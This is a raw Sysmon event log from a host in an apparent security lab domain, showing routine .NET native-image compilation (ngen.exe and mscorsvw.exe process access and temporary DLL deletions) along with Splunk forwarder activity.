21:07:04.496{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6D05-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.496{4DB9351A-A278-60D3-6C05-00000000CF01}6500NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3PFTMNKWIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.ni.dll.auxMD5=53B6F459EA32C563A98746EF6CFB2EE1,SHA256=984444B75447D00BAF371C721B161536C5A534E6BBD02FCF733E97D7AAEF7E5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.496{4DB9351A-A278-60D3-6C05-00000000CF01}6500NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3PFTMNKWIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.ni.dllMD5=D788404C7AB0F22FD210B80CCDEA08D6,SHA256=76C00F6E14E8E80B94DD4DE0A38555F91BAFFD55E31FAAFAC801D36B1EA4DDB4,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.464{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6C05-00000000CF01}6500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.449{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6C05-00000000CF01}6500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.449{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6C05-00000000CF01}6500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.433{4DB9351A-A278-60D3-6B05-00000000CF01}2728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QDK4SNQ125\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.ni.dll.auxMD5=2A97AAF91EC661291BE4C50D7ED9AB0F,SHA256=212AC6BF7365F720C8C4731A9EBCFF6553BFE36BB3C751EB992964EBF18BFB48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.433{4DB9351A-A278-60D3-6B05-00000000CF01}2728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QDK4SNQ125\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.ni.dllMD5=C4095DF3F0E223A7AED2FB487CD59141,SHA256=752A1BC57240F1D8E81C8B19C954C412E6C358F426D635C3565730635FD9B5B6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.418{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6B05-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.386{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6B05-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.386{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6B05-00000000CF01}2728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.386{4DB9351A-A278-60D3-6A05-00000000CF01}6468NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KTT211RLWR\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.ni.dll.auxMD5=F8BFB47FC8232D4954D3DBB6DC6E5904,SHA256=0DF6A3E4A66B367FBFE4D696BB0F4209811CEA00929A224CE0446CC249518D86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.386{4DB9351A-A278-60D3-6A05-00000000CF01}6468NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KTT211RLWR\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.ni.dllMD5=FFB4B30E41F982885FC264B305BC2592,SHA256=A812532E90560DF8E3A122EBB0F26D47E9293CB2F6BC16233F22AC56CE3235F7,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.355{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6A05-00000000CF01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.339{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6A05-00000000CF01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.339{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6A05-00000000CF01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.339{4DB9351A-A278-60D3-6905-00000000CF01}4352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6T9635YZ29\Microsoft.SecureBoot.Commands.ni.dll.auxMD5=4ADFDC91CE65FA1ACF5F8D1D0586B949,SHA256=80972BDAD07D08EF82D48B17CC0682F4659CBB052DE759EEB39F03B4A054EB0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.339{4DB9351A-A278-60D3-6905-00000000CF01}4352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6T9635YZ29\Microsoft.SecureBoot.Commands.ni.dllMD5=71D18AB66C5A360415E66D27045560CA,SHA256=CCEAB97AEFDE3B36A39470D9EC532D67A43FDD200EE205331E3E82B7747F77F3,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.308{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6905-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.277{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6905-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.277{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6905-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.277{4DB9351A-A278-60D3-6805-00000000CF01}3492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8JLYFCKCRW\Microsoft.RightsManagementServices.ServerManager.DeploymentPlugin.ni.dll.auxMD5=C0E5E6BBF2DFFB16FBFE023C077A9A5A,SHA256=A67D671AB222D3A02198D8A807FFF5FBF8F87DAD31562901FFE195E3E5EF73F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.277{4DB9351A-A278-60D3-6805-00000000CF01}3492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8JLYFCKCRW\Microsoft.RightsManagementServices.ServerManager.DeploymentPlugin.ni.dllMD5=8D976435E8D16643EB1A9C5EF5B33ECF,SHA256=F18602583152B5B2E7F0244FCF2DA74C0C4091014427E978277AE7C3648F9404,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.199{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E07E643ED02999EFD3B30C4984D9F6A1,SHA256=5AED4D23493F0C74DEF401FE6B978274F9F36591703D4433C9608776315DA714,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.183{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-6805-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.136{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A278-60D3-6805-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.136{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A278-60D3-6805-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.121{4DB9351A-A277-60D3-6705-00000000CF01}6716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U2S8M7QW5M\Microsoft.PowerShell.Workflow.ServiceCore.ni.dll.auxMD5=56A136023721FA12E0CC2CB47EAAA5D5,SHA256=B421DAD35CF4247E3DB19675FBFF8DCC7FE03D3C5EA24224802E313665DA94B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.121{4DB9351A-A277-60D3-6705-00000000CF01}6716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U2S8M7QW5M\Microsoft.PowerShell.Workflow.ServiceCore.ni.dllMD5=B082C8986B141770DCBFA7C9143D4666,SHA256=E6172B46AD5EE40DB330EE12D7082A2B619C6052E23AD54E458564D397FEAB63,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 